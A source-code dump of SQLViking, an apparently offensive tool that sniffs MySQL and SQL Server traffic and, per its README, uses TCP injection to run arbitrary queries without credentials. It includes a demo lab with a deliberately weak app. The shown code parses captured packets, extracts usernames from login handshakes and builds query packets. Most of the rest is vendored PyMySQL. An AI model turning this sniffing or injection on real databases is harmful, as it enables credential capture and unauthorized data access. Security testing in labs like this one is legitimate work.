├── .gitignore ├── README.md ├── databases ├── .DS_Store ├── basedb.py ├── constantvalues.py ├── mysql.py ├── pymysql │ ├── __init__.py │ ├── _compat.py │ ├── _socketio.py │ ├── charset.py │ ├── connections.py │ ├── constants │ │ ├── CLIENT.py │ │ ├── COMMAND.py │ │ ├── ER.py │ │ ├── FIELD_TYPE.py │ │ ├── FLAG.py │ │ ├── SERVER_STATUS.py │ │ └── __init__.py │ ├── converters.py │ ├── cursors.py │ ├── err.py │ ├── times.py │ └── util.py ├── pytds │ ├── collate.cover │ ├── collate.py │ ├── tds.cover │ ├── tds.py │ ├── tz.cover │ └── tz.py └── sqlserver.py ├── demo ├── Vagrantfile ├── db │ └── create.sql ├── sinatra-app │ ├── .rvmrc │ ├── Gemfile │ ├── Gemfile.lock │ ├── Rakefile │ ├── app.rb │ ├── config.ru │ ├── database_mysql.yml │ ├── db │ │ ├── migrate │ │ │ └── 20140913010102_create_comments.rb │ │ ├── schema.rb │ │ └── seeds.rb │ └── views │ │ └── index.erb └── vagrant-scripts │ ├── config │ └── my.cnf │ ├── configure-sql-port.ps1 │ ├── enable-rdp.ps1 │ ├── install-dot-net.ps1 │ ├── install-sql-server.cmd │ ├── prepare-weakapp.sh │ ├── setup-mysql.sh │ ├── setup-sqlviking.sh │ └── setup-weakapp.sh ├── sqlviking.conf └── sqlviking.py /.gitignore: -------------------------------------------------------------------------------- 1 | databases/*.pyc 2 | databases/pymysql/*.pyc 3 | databases/pymysql/constants/*.pyc 4 | databases/pytds/*.pyc 5 | *.txt 6 | .vagrant 7 | NDP451-KB2858728-x86-x64-AllOS-ENU.exe 8 | SQLEXPRWT_x64_ENU.exe 9 | 10 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | SQLViking 2 | ========= 3 | 4 | ```sudo python sqlviking.py -c ``` 5 | 6 | The tool is broken into two pieces: 7 | 1. Scout: passively reads and logs SQL queries and their responses on the wire 8 | 2. Pillage: leverages TCP injection to execute arbitrary queries and parse responses without needing credentials 9 | 10 | TDS (tabular data stream) parsing functionality forked from pytds: https://github.com/denisenkom/pytds 11 | 12 | MySQL parsing functionality forked from PyMySQL: https://github.com/PyMySQL 13 | 14 | Currently only functional on Linux due to some hackery with signals to make raw_input() non-blocking. 15 | 16 | Requires: scapy, Python 2.7.x 17 | 18 | ##Deploying the DEMO MySQL Environment 19 | (assumes Vagrant is installed on your machine) 20 | ```bash 21 | vagrant box add phusion/ubuntu-14.04-amd64 22 | cd $SQLVIKING_HOME 23 | vagrant up sqlviking mysql weakapp 24 | ``` 25 | #####NOTE: We're still having trouble getting the web app's background process to behave, so if you bring the VMs up in the order above, the weakapp will come up last. The server itself will be running correctly once deployment finishes. 26 | 27 | Once these three VMs are running, the weak application should be available for submitting requests. Check this in your browser by navigating to `localhost:4567`. 28 | 29 | (open a new terminal window) 30 | ```bash 31 | vagrant ssh sqlviking 32 | ``` 33 | 34 | Inside the sqlviking VM 35 | ```bash 36 | vagrant@ubuntu-14:/opt/sqlviking$ cd /opt/sqlviking 37 | vagrant@ubuntu-14:/opt/sqlviking$ sudo python sqlviking.py 38 | ``` 39 | 40 | ##Common Issues 41 | ###Is it working yet? 42 | Actually, yes! 43 | ###SQLViking isn't picking anything up :( 44 | Make sure you run sqlviking with `sudo`; without it, scapy doesn't have the access to the network interface that it needs. Virtual interfaces run by VirtualBox also don't seem to play nicely with pcap-based tools, including Wireshark. Try setting up a test box with VMware instead.
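If nothing shows up even with `sudo`, a quick way to rule out a capture problem is a bare scapy sniff run as root. This is not part of SQLViking, and `eth0` and port 3306 below are only examples; substitute the interface and database port you are actually targeting.
```python
from scapy.all import sniff

# Print a one-line summary of the next few packets seen on the DB port
pkts = sniff(iface="eth0", filter="tcp port 3306", count=5, timeout=30)
for p in pkts:
    print(p.summary())
```
If this prints nothing while you generate database traffic, the capture setup itself (interface, permissions, or the virtual NIC) is the problem rather than SQLViking.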
45 | ###I can't inject in the vagrant environment 46 | We know. Scapy (the library we use to read and write packets on the wire) doesn't play nicely with virtual interfaces. We're working to resolve this now. 47 | -------------------------------------------------------------------------------- /databases/.DS_Store: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Atticuss/SQLViking/18f31b004de44d820b82ea05ec79a6eb7dc61dae/databases/.DS_Store -------------------------------------------------------------------------------- /databases/basedb.py: -------------------------------------------------------------------------------- 1 | import abc 2 | 3 | class BaseDB(): 4 | __metaclass__ = abc.ABCMeta 5 | 6 | @abc.abstractmethod 7 | def encodeQuery(self,query): 8 | return 9 | 10 | @abc.abstractmethod 11 | def isDB(self, payload): 12 | return 13 | 14 | @abc.abstractmethod 15 | def isReq(self, payloads): 16 | return 17 | 18 | @abc.abstractmethod 19 | def isResp(self, payloads): 20 | return 21 | 22 | @abc.abstractmethod 23 | def parseReq(self, data, conn): 24 | return 25 | 26 | @abc.abstractmethod 27 | def parseResp(self, data, conn): 28 | return -------------------------------------------------------------------------------- /databases/constantvalues.py: -------------------------------------------------------------------------------- 1 | #when adding additional DBs, assign their value to the next unused prime number 2 | UNKNOWN = 1 3 | REQUEST = 2 4 | RESPONSE = 3 5 | MYSQL = 5 6 | SQLSERV = 7 7 | MYSQLREQ = MYSQL * REQUEST 8 | MYSQLRESP = MYSQL * RESPONSE 9 | SQLSERVREQ = SQLSERV * REQUEST 10 | SQLSERVRESP = SQLSERV * RESPONSE 11 | 12 | ISREQ = lambda x: x % REQUEST == 0 13 | ISRESP = lambda x: x % RESPONSE == 0 14 | ISMYSQL = lambda x: x % MYSQL == 0 15 | ISSQLSERV = lambda x: x % SQLSERV == 0 16 | 17 | HANDSHAKE = 1 18 | ESTABLISHED = 2 19 | 20 | HUMAN = 1 21 | CSV = 2 22 | JSON = 3 -------------------------------------------------------------------------------- /databases/mysql.py: -------------------------------------------------------------------------------- 1 | import abc,sys 2 | from basedb import BaseDB 3 | from sys import path 4 | from constantvalues import * 5 | path.append("databases/pymysql/") 6 | import connections 7 | 8 | COM_INIT_DB = '02' 9 | 10 | class MySqlDB(BaseDB): 11 | def __init__(self): 12 | pass 13 | 14 | def encodeQuery(self,query): #builds a COM_QUERY packet: 3-byte little-endian length, sequence id 0x00, command 0x03, then the query text 15 | length = hex(len(query)+1)[2:] 16 | if len(length)%2 == 1: 17 | length = '0'+length 18 | length = self.flipEndian(length)+'0'*(6-len(length)) 19 | return (length+'0003').decode('hex')+query 20 | 21 | def getPayloads(self,data): 22 | encpkt = str(data).encode('hex') 23 | pktlen = len(encpkt)/2 24 | payloads = [] 25 | 26 | while len(encpkt)>0: 27 | length = int(self.flipEndian(encpkt[:6]),16) #first 3 bytes (6 hex chars) are the little-endian payload length; the 4th byte is the sequence id 28 | payloads.append(encpkt[8:8+(length*2)]) 29 | encpkt = encpkt[8+(length*2):] 30 | 31 | return payloads 32 | 33 | def printLn(self,msg): 34 | with open('out.txt','a') as f: 35 | f.write(msg+'\n') 36 | 37 | def isDB(self,payload): 38 | encpkt = str(payload).encode('hex') 39 | pktlen = len(encpkt)/2 40 | lengths = [] 41 | payloads = [] 42 | 43 | while len(encpkt)>0: 44 | length = int(self.flipEndian(encpkt[:6]),16) 45 | lengths.append(length) 46 | payloads.append(encpkt[8:8+(length*2)]) 47 | encpkt = encpkt[8+(length*2):] 48 | 49 |
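#heuristic: total the declared payload lengths plus 4 header bytes per packet;
#if that exactly accounts for the captured TCP payload (and at least one payload was parsed), treat the traffic as MySQL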
tlen=0 50 | for l in lengths: 51 | tlen+=l 52 | tlen+= len(lengths)*4 53 | 54 | if tlen == pktlen and len(payloads) > 0: 55 | if self.isReq(payloads): 56 | pktType = MYSQLREQ 57 | elif self.isResp(payloads): 58 | pktType = MYSQLRESP 59 | else: #possibly MySQL, cannot determine if req/resp right now 60 | pktType = MYSQL 61 | else: #not a MySQL pkt 62 | pktType = UNKNOWN 63 | 64 | return pktType 65 | 66 | def isReq(self,payloads): 67 | if payloads[0] == '0e': #COM_PING 68 | return True 69 | 70 | def isResp(self,payloads): 71 | if payloads[0] == '00000002000000': #OK RESP 72 | return True 73 | elif payloads[0][:2] == 'ff': #ERR RESP 74 | return True 75 | elif len(payloads[0]) == 2 and int(payloads[0], 16) == self.getMysqlCols(payloads): #Query RESP 76 | return True 77 | 78 | #if database can be determined, create db if it doesn't exist or point to existing db 79 | #if user can be determined, update db.users 80 | 81 | def parseReq(self,data,conn): 82 | ret = [] 83 | payloads = self.getPayloads(data) 84 | 85 | if conn.state == HANDSHAKE: #parse login pkt 86 | p = payloads[0][64:] #assumes HandshakeResponse41, no check for HandshakeResponse320. should be fine, 4.1 was released 2004. doubt any dbs are on a decade old version. 87 | username = '' 88 | for c in p: 89 | if p[:2] != '00': 90 | username += p[:2].decode('hex') 91 | else: 92 | break 93 | p = p[2:] 94 | conn.foundUser(username) 95 | conn.state = ESTABLISHED 96 | 97 | if payloads[0][:2] == COM_INIT_DB: #assumes schema is correct. no check for successful response from server 98 | conn.setInstance(payloads[0][2:].decode('hex')) 99 | ret.append('Switched to instance:\t%s'%payloads[0][2:].decode('hex')) 100 | else: 101 | data = data.encode('hex') 102 | pktlen = len(data)/2 103 | lengths = [] 104 | 105 | while len(data)>0: 106 | length = int(self.flipEndian(data[:6]),16) 107 | lengths.append(length) 108 | ret.append(self.readable(data[8:8+(length*2)])) 109 | data = data[8+(length*2):] 110 | return ret 111 | 112 | def parseResp(self,data,conn): 113 | encdata = data.encode('hex') 114 | pktlen = len(encdata)/2 115 | lengths = [] 116 | ret = [] 117 | 118 | while len(encdata)>0: 119 | length = int(self.flipEndian(encdata[:6]),16) 120 | lengths.append(length) 121 | encdata = encdata[8+(length*2):] 122 | 123 | payloads = self.getPayloads(data) 124 | if payloads[0] == '00000002000000': #OK resp 125 | ret.append('Server OK response') 126 | else: 127 | res = connections.MySQLResult(connections.Result(data)) 128 | try: 129 | res.read() 130 | if res.message and len(res.message) > 0: 131 | for m in res.message: 132 | ret.append(m) 133 | if res.description and len(res.description) > 0: 134 | ret.append(str(res.description)) 135 | if res.rows and len(res.rows)>0: 136 | for r in res.rows: 137 | ret.append(str(r)) 138 | except: 139 | ret.append(sys.exc_info()[1]) 140 | return ret 141 | 142 | def getMysqlCols(self,payloads): 143 | c = -1 #ignore first payload 144 | for p in payloads: 145 | if p == "fe00002200": 146 | return c 147 | else: 148 | c+=1 149 | 150 | def flipEndian(self,data): 151 | resp='' 152 | for i in range(0,len(data),2): 153 | resp = data[i]+data[i+1]+resp 154 | return resp 155 | 156 | def validAscii(self,h): 157 | if int(h,16)>31 and int(h,16)<127: 158 | return True 159 | return False 160 | 161 | def readable(self,data): 162 | a="" 163 | for i in range(0,len(data),2): 164 | if self.validAscii(data[i:i+2]): 165 | a+=data[i:i+2].decode('hex') 166 | return a -------------------------------------------------------------------------------- 
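For reference, the framing that `encodeQuery`, `getPayloads`, and `isDB` above rely on is the standard MySQL packet layout: a 3-byte little-endian payload length, a 1-byte sequence id, and then the payload, whose first byte on the client side is the command code (0x03 COM_QUERY, 0x02 COM_INIT_DB, 0x0e COM_PING). Below is a minimal standalone sketch of the same round trip on raw bytes rather than the hex strings used above; the helper names are hypothetical, and it assumes Python 2.7 as the README requires.
```python
import struct

def encode_query(query, seq=0):
    # COM_QUERY (0x03) followed by the query text
    payload = '\x03' + query
    # 3-byte little-endian length + 1-byte sequence id + payload
    return struct.pack('<I', len(payload))[:3] + chr(seq) + payload

def split_packets(data):
    # Walk a reassembled TCP payload and return each MySQL packet body
    bodies = []
    while data:
        length = struct.unpack('<I', data[:3] + '\x00')[0]
        bodies.append(data[4:4 + length])
        data = data[4 + length:]
    return bodies

print(split_packets(encode_query('SELECT 1'))[0][1:])  # -> SELECT 1
```
This mirrors what `encodeQuery` emits (length + '0003' in hex) and what `getPayloads` strips off before handing payloads to the parser.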
/databases/pymysql/__init__.py: -------------------------------------------------------------------------------- 1 | ''' 2 | PyMySQL: A pure-Python MySQL client library. 3 | 4 | Copyright (c) 2010, 2013 PyMySQL contributors 5 | 6 | Permission is hereby granted, free of charge, to any person obtaining a copy 7 | of this software and associated documentation files (the "Software"), to deal 8 | in the Software without restriction, including without limitation the rights 9 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 10 | copies of the Software, and to permit persons to whom the Software is 11 | furnished to do so, subject to the following conditions: 12 | 13 | The above copyright notice and this permission notice shall be included in 14 | all copies or substantial portions of the Software. 15 | 16 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 17 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 18 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 19 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 20 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 21 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN 22 | THE SOFTWARE. 23 | 24 | ''' 25 | 26 | VERSION = (0, 6, 2, None) 27 | 28 | from ._compat import text_type, JYTHON, IRONPYTHON 29 | from .constants import FIELD_TYPE 30 | from .converters import escape_dict, escape_sequence, escape_string 31 | from .err import Warning, Error, InterfaceError, DataError, \ 32 | DatabaseError, OperationalError, IntegrityError, InternalError, \ 33 | NotSupportedError, ProgrammingError, MySQLError 34 | from .times import Date, Time, Timestamp, \ 35 | DateFromTicks, TimeFromTicks, TimestampFromTicks 36 | 37 | import sys 38 | 39 | 40 | threadsafety = 1 41 | apilevel = "2.0" 42 | paramstyle = "format" 43 | 44 | class DBAPISet(frozenset): 45 | 46 | 47 | def __ne__(self, other): 48 | if isinstance(other, set): 49 | return super(DBAPISet, self).__ne__(self, other) 50 | else: 51 | return other not in self 52 | 53 | def __eq__(self, other): 54 | if isinstance(other, frozenset): 55 | return frozenset.__eq__(self, other) 56 | else: 57 | return other in self 58 | 59 | def __hash__(self): 60 | return frozenset.__hash__(self) 61 | 62 | 63 | STRING = DBAPISet([FIELD_TYPE.ENUM, FIELD_TYPE.STRING, 64 | FIELD_TYPE.VAR_STRING]) 65 | BINARY = DBAPISet([FIELD_TYPE.BLOB, FIELD_TYPE.LONG_BLOB, 66 | FIELD_TYPE.MEDIUM_BLOB, FIELD_TYPE.TINY_BLOB]) 67 | NUMBER = DBAPISet([FIELD_TYPE.DECIMAL, FIELD_TYPE.DOUBLE, FIELD_TYPE.FLOAT, 68 | FIELD_TYPE.INT24, FIELD_TYPE.LONG, FIELD_TYPE.LONGLONG, 69 | FIELD_TYPE.TINY, FIELD_TYPE.YEAR]) 70 | DATE = DBAPISet([FIELD_TYPE.DATE, FIELD_TYPE.NEWDATE]) 71 | TIME = DBAPISet([FIELD_TYPE.TIME]) 72 | TIMESTAMP = DBAPISet([FIELD_TYPE.TIMESTAMP, FIELD_TYPE.DATETIME]) 73 | DATETIME = TIMESTAMP 74 | ROWID = DBAPISet() 75 | 76 | def Binary(x): 77 | """Return x as a binary type.""" 78 | if isinstance(x, text_type) and not (JYTHON or IRONPYTHON): 79 | return x.encode() 80 | return bytes(x) 81 | 82 | def Connect(*args, **kwargs): 83 | """ 84 | Connect to the database; see connections.Connection.__init__() for 85 | more information. 
86 | """ 87 | from .connections import Connection 88 | return Connection(*args, **kwargs) 89 | 90 | from pymysql import connections as _orig_conn 91 | if _orig_conn.Connection.__init__.__doc__ is not None: 92 | Connect.__doc__ = _orig_conn.Connection.__init__.__doc__ + (""" 93 | See connections.Connection.__init__() for information about defaults. 94 | """) 95 | del _orig_conn 96 | 97 | def get_client_info(): # for MySQLdb compatibility 98 | return '.'.join(map(str, VERSION)) 99 | 100 | connect = Connection = Connect 101 | 102 | # we include a doctored version_info here for MySQLdb compatibility 103 | version_info = (1,2,2,"final",0) 104 | 105 | NULL = "NULL" 106 | 107 | __version__ = get_client_info() 108 | 109 | def thread_safe(): 110 | return True # match MySQLdb.thread_safe() 111 | 112 | def install_as_MySQLdb(): 113 | """ 114 | After this function is called, any application that imports MySQLdb or 115 | _mysql will unwittingly actually use 116 | """ 117 | sys.modules["MySQLdb"] = sys.modules["_mysql"] = sys.modules["pymysql"] 118 | 119 | __all__ = [ 120 | 'BINARY', 'Binary', 'Connect', 'Connection', 'DATE', 'Date', 121 | 'Time', 'Timestamp', 'DateFromTicks', 'TimeFromTicks', 'TimestampFromTicks', 122 | 'DataError', 'DatabaseError', 'Error', 'FIELD_TYPE', 'IntegrityError', 123 | 'InterfaceError', 'InternalError', 'MySQLError', 'NULL', 'NUMBER', 124 | 'NotSupportedError', 'DBAPISet', 'OperationalError', 'ProgrammingError', 125 | 'ROWID', 'STRING', 'TIME', 'TIMESTAMP', 'Warning', 'apilevel', 'connect', 126 | 'connections', 'constants', 'converters', 'cursors', 127 | 'escape_dict', 'escape_sequence', 'escape_string', 'get_client_info', 128 | 'paramstyle', 'threadsafety', 'version_info', 129 | 130 | "install_as_MySQLdb", 131 | 132 | "NULL","__version__", 133 | ] 134 | -------------------------------------------------------------------------------- /databases/pymysql/_compat.py: -------------------------------------------------------------------------------- 1 | import sys 2 | 3 | PY2 = sys.version_info[0] == 2 4 | PYPY = hasattr(sys, 'pypy_translation_info') 5 | JYTHON = sys.platform.startswith('java') 6 | IRONPYTHON = sys.platform == 'cli' 7 | 8 | if PY2: 9 | range_type = xrange 10 | text_type = unicode 11 | long_type = long 12 | str_type = basestring 13 | else: 14 | range_type = range 15 | text_type = str 16 | long_type = int 17 | str_type = str 18 | -------------------------------------------------------------------------------- /databases/pymysql/_socketio.py: -------------------------------------------------------------------------------- 1 | """ 2 | SocketIO imported from socket module in Python 3. 3 | 4 | Copyright (c) 2001-2013 Python Software Foundation; All Rights Reserved. 5 | """ 6 | 7 | from socket import * 8 | import io 9 | import errno 10 | 11 | __all__ = ['SocketIO'] 12 | 13 | EINTR = errno.EINTR 14 | _blocking_errnos = (errno.EAGAIN, errno.EWOULDBLOCK) 15 | 16 | class SocketIO(io.RawIOBase): 17 | 18 | """Raw I/O implementation for stream sockets. 19 | 20 | This class supports the makefile() method on sockets. It provides 21 | the raw I/O interface on top of a socket object. 22 | """ 23 | 24 | # One might wonder why not let FileIO do the job instead. 
There are two 25 | # main reasons why FileIO is not adapted: 26 | # - it wouldn't work under Windows (where you can't used read() and 27 | # write() on a socket handle) 28 | # - it wouldn't work with socket timeouts (FileIO would ignore the 29 | # timeout and consider the socket non-blocking) 30 | 31 | # XXX More docs 32 | 33 | def __init__(self, sock, mode): 34 | if mode not in ("r", "w", "rw", "rb", "wb", "rwb"): 35 | raise ValueError("invalid mode: %r" % mode) 36 | io.RawIOBase.__init__(self) 37 | self._sock = sock 38 | if "b" not in mode: 39 | mode += "b" 40 | self._mode = mode 41 | self._reading = "r" in mode 42 | self._writing = "w" in mode 43 | self._timeout_occurred = False 44 | 45 | def readinto(self, b): 46 | """Read up to len(b) bytes into the writable buffer *b* and return 47 | the number of bytes read. If the socket is non-blocking and no bytes 48 | are available, None is returned. 49 | 50 | If *b* is non-empty, a 0 return value indicates that the connection 51 | was shutdown at the other end. 52 | """ 53 | self._checkClosed() 54 | self._checkReadable() 55 | if self._timeout_occurred: 56 | raise IOError("cannot read from timed out object") 57 | while True: 58 | try: 59 | return self._sock.recv_into(b) 60 | except timeout: 61 | self._timeout_occurred = True 62 | raise 63 | except error as e: 64 | n = e.args[0] 65 | if n == EINTR: 66 | continue 67 | if n in _blocking_errnos: 68 | return None 69 | raise 70 | 71 | def write(self, b): 72 | """Write the given bytes or bytearray object *b* to the socket 73 | and return the number of bytes written. This can be less than 74 | len(b) if not all data could be written. If the socket is 75 | non-blocking and no bytes could be written None is returned. 76 | """ 77 | self._checkClosed() 78 | self._checkWritable() 79 | try: 80 | return self._sock.send(b) 81 | except error as e: 82 | # XXX what about EINTR? 83 | if e.args[0] in _blocking_errnos: 84 | return None 85 | raise 86 | 87 | def readable(self): 88 | """True if the SocketIO is open for reading. 89 | """ 90 | if self.closed: 91 | raise ValueError("I/O operation on closed socket.") 92 | return self._reading 93 | 94 | def writable(self): 95 | """True if the SocketIO is open for writing. 96 | """ 97 | if self.closed: 98 | raise ValueError("I/O operation on closed socket.") 99 | return self._writing 100 | 101 | def seekable(self): 102 | """True if the SocketIO is open for seeking. 103 | """ 104 | if self.closed: 105 | raise ValueError("I/O operation on closed socket.") 106 | return super().seekable() 107 | 108 | def fileno(self): 109 | """Return the file descriptor of the underlying socket. 110 | """ 111 | self._checkClosed() 112 | return self._sock.fileno() 113 | 114 | @property 115 | def name(self): 116 | if not self.closed: 117 | return self.fileno() 118 | else: 119 | return -1 120 | 121 | @property 122 | def mode(self): 123 | return self._mode 124 | 125 | def close(self): 126 | """Close the SocketIO object. This doesn't close the underlying 127 | socket, except if all references to it have disappeared. 
128 | """ 129 | if self.closed: 130 | return 131 | io.RawIOBase.close(self) 132 | self._sock._decref_socketios() 133 | self._sock = None 134 | 135 | -------------------------------------------------------------------------------- /databases/pymysql/charset.py: -------------------------------------------------------------------------------- 1 | MBLENGTH = { 2 | 8:1, 3 | 33:3, 4 | 88:2, 5 | 91:2 6 | } 7 | 8 | 9 | class Charset(object): 10 | def __init__(self, id, name, collation, is_default): 11 | self.id, self.name, self.collation = id, name, collation 12 | self.is_default = is_default == 'Yes' 13 | 14 | @property 15 | def encoding(self): 16 | name = self.name 17 | if name == 'utf8mb4': 18 | return 'utf8' 19 | return name 20 | 21 | @property 22 | def is_binary(self): 23 | return self.id == 63 24 | 25 | 26 | class Charsets: 27 | def __init__(self): 28 | self._by_id = {} 29 | 30 | def add(self, c): 31 | self._by_id[c.id] = c 32 | 33 | def by_id(self, id): 34 | return self._by_id[id] 35 | 36 | def by_name(self, name): 37 | name = name.lower() 38 | for c in self._by_id.values(): 39 | if c.name == name and c.is_default: 40 | return c 41 | 42 | _charsets = Charsets() 43 | """ 44 | Generated with: 45 | 46 | mysql -N -s -e "select id, character_set_name, collation_name, is_default 47 | from information_schema.collations order by id;" | python -c "import sys 48 | for l in sys.stdin.readlines(): 49 | id, name, collation, is_default = l.split(chr(9)) 50 | print '_charsets.add(Charset(%s, \'%s\', \'%s\', \'%s\'))' \ 51 | % (id, name, collation, is_default.strip()) 52 | " 53 | 54 | """ 55 | _charsets.add(Charset(1, 'big5', 'big5_chinese_ci', 'Yes')) 56 | _charsets.add(Charset(2, 'latin2', 'latin2_czech_cs', '')) 57 | _charsets.add(Charset(3, 'dec8', 'dec8_swedish_ci', 'Yes')) 58 | _charsets.add(Charset(4, 'cp850', 'cp850_general_ci', 'Yes')) 59 | _charsets.add(Charset(5, 'latin1', 'latin1_german1_ci', '')) 60 | _charsets.add(Charset(6, 'hp8', 'hp8_english_ci', 'Yes')) 61 | _charsets.add(Charset(7, 'koi8r', 'koi8r_general_ci', 'Yes')) 62 | _charsets.add(Charset(8, 'latin1', 'latin1_swedish_ci', 'Yes')) 63 | _charsets.add(Charset(9, 'latin2', 'latin2_general_ci', 'Yes')) 64 | _charsets.add(Charset(10, 'swe7', 'swe7_swedish_ci', 'Yes')) 65 | _charsets.add(Charset(11, 'ascii', 'ascii_general_ci', 'Yes')) 66 | _charsets.add(Charset(12, 'ujis', 'ujis_japanese_ci', 'Yes')) 67 | _charsets.add(Charset(13, 'sjis', 'sjis_japanese_ci', 'Yes')) 68 | _charsets.add(Charset(14, 'cp1251', 'cp1251_bulgarian_ci', '')) 69 | _charsets.add(Charset(15, 'latin1', 'latin1_danish_ci', '')) 70 | _charsets.add(Charset(16, 'hebrew', 'hebrew_general_ci', 'Yes')) 71 | _charsets.add(Charset(18, 'tis620', 'tis620_thai_ci', 'Yes')) 72 | _charsets.add(Charset(19, 'euckr', 'euckr_korean_ci', 'Yes')) 73 | _charsets.add(Charset(20, 'latin7', 'latin7_estonian_cs', '')) 74 | _charsets.add(Charset(21, 'latin2', 'latin2_hungarian_ci', '')) 75 | _charsets.add(Charset(22, 'koi8u', 'koi8u_general_ci', 'Yes')) 76 | _charsets.add(Charset(23, 'cp1251', 'cp1251_ukrainian_ci', '')) 77 | _charsets.add(Charset(24, 'gb2312', 'gb2312_chinese_ci', 'Yes')) 78 | _charsets.add(Charset(25, 'greek', 'greek_general_ci', 'Yes')) 79 | _charsets.add(Charset(26, 'cp1250', 'cp1250_general_ci', 'Yes')) 80 | _charsets.add(Charset(27, 'latin2', 'latin2_croatian_ci', '')) 81 | _charsets.add(Charset(28, 'gbk', 'gbk_chinese_ci', 'Yes')) 82 | _charsets.add(Charset(29, 'cp1257', 'cp1257_lithuanian_ci', '')) 83 | _charsets.add(Charset(30, 'latin5', 'latin5_turkish_ci', 'Yes')) 
84 | _charsets.add(Charset(31, 'latin1', 'latin1_german2_ci', '')) 85 | _charsets.add(Charset(32, 'armscii8', 'armscii8_general_ci', 'Yes')) 86 | _charsets.add(Charset(33, 'utf8', 'utf8_general_ci', 'Yes')) 87 | _charsets.add(Charset(34, 'cp1250', 'cp1250_czech_cs', '')) 88 | _charsets.add(Charset(35, 'ucs2', 'ucs2_general_ci', 'Yes')) 89 | _charsets.add(Charset(36, 'cp866', 'cp866_general_ci', 'Yes')) 90 | _charsets.add(Charset(37, 'keybcs2', 'keybcs2_general_ci', 'Yes')) 91 | _charsets.add(Charset(38, 'macce', 'macce_general_ci', 'Yes')) 92 | _charsets.add(Charset(39, 'macroman', 'macroman_general_ci', 'Yes')) 93 | _charsets.add(Charset(40, 'cp852', 'cp852_general_ci', 'Yes')) 94 | _charsets.add(Charset(41, 'latin7', 'latin7_general_ci', 'Yes')) 95 | _charsets.add(Charset(42, 'latin7', 'latin7_general_cs', '')) 96 | _charsets.add(Charset(43, 'macce', 'macce_bin', '')) 97 | _charsets.add(Charset(44, 'cp1250', 'cp1250_croatian_ci', '')) 98 | _charsets.add(Charset(45, 'utf8mb4', 'utf8mb4_general_ci', 'Yes')) 99 | _charsets.add(Charset(46, 'utf8mb4', 'utf8mb4_bin', '')) 100 | _charsets.add(Charset(47, 'latin1', 'latin1_bin', '')) 101 | _charsets.add(Charset(48, 'latin1', 'latin1_general_ci', '')) 102 | _charsets.add(Charset(49, 'latin1', 'latin1_general_cs', '')) 103 | _charsets.add(Charset(50, 'cp1251', 'cp1251_bin', '')) 104 | _charsets.add(Charset(51, 'cp1251', 'cp1251_general_ci', 'Yes')) 105 | _charsets.add(Charset(52, 'cp1251', 'cp1251_general_cs', '')) 106 | _charsets.add(Charset(53, 'macroman', 'macroman_bin', '')) 107 | _charsets.add(Charset(54, 'utf16', 'utf16_general_ci', 'Yes')) 108 | _charsets.add(Charset(55, 'utf16', 'utf16_bin', '')) 109 | _charsets.add(Charset(57, 'cp1256', 'cp1256_general_ci', 'Yes')) 110 | _charsets.add(Charset(58, 'cp1257', 'cp1257_bin', '')) 111 | _charsets.add(Charset(59, 'cp1257', 'cp1257_general_ci', 'Yes')) 112 | _charsets.add(Charset(60, 'utf32', 'utf32_general_ci', 'Yes')) 113 | _charsets.add(Charset(61, 'utf32', 'utf32_bin', '')) 114 | _charsets.add(Charset(63, 'binary', 'binary', 'Yes')) 115 | _charsets.add(Charset(64, 'armscii8', 'armscii8_bin', '')) 116 | _charsets.add(Charset(65, 'ascii', 'ascii_bin', '')) 117 | _charsets.add(Charset(66, 'cp1250', 'cp1250_bin', '')) 118 | _charsets.add(Charset(67, 'cp1256', 'cp1256_bin', '')) 119 | _charsets.add(Charset(68, 'cp866', 'cp866_bin', '')) 120 | _charsets.add(Charset(69, 'dec8', 'dec8_bin', '')) 121 | _charsets.add(Charset(70, 'greek', 'greek_bin', '')) 122 | _charsets.add(Charset(71, 'hebrew', 'hebrew_bin', '')) 123 | _charsets.add(Charset(72, 'hp8', 'hp8_bin', '')) 124 | _charsets.add(Charset(73, 'keybcs2', 'keybcs2_bin', '')) 125 | _charsets.add(Charset(74, 'koi8r', 'koi8r_bin', '')) 126 | _charsets.add(Charset(75, 'koi8u', 'koi8u_bin', '')) 127 | _charsets.add(Charset(77, 'latin2', 'latin2_bin', '')) 128 | _charsets.add(Charset(78, 'latin5', 'latin5_bin', '')) 129 | _charsets.add(Charset(79, 'latin7', 'latin7_bin', '')) 130 | _charsets.add(Charset(80, 'cp850', 'cp850_bin', '')) 131 | _charsets.add(Charset(81, 'cp852', 'cp852_bin', '')) 132 | _charsets.add(Charset(82, 'swe7', 'swe7_bin', '')) 133 | _charsets.add(Charset(83, 'utf8', 'utf8_bin', '')) 134 | _charsets.add(Charset(84, 'big5', 'big5_bin', '')) 135 | _charsets.add(Charset(85, 'euckr', 'euckr_bin', '')) 136 | _charsets.add(Charset(86, 'gb2312', 'gb2312_bin', '')) 137 | _charsets.add(Charset(87, 'gbk', 'gbk_bin', '')) 138 | _charsets.add(Charset(88, 'sjis', 'sjis_bin', '')) 139 | _charsets.add(Charset(89, 'tis620', 'tis620_bin', '')) 140 | 
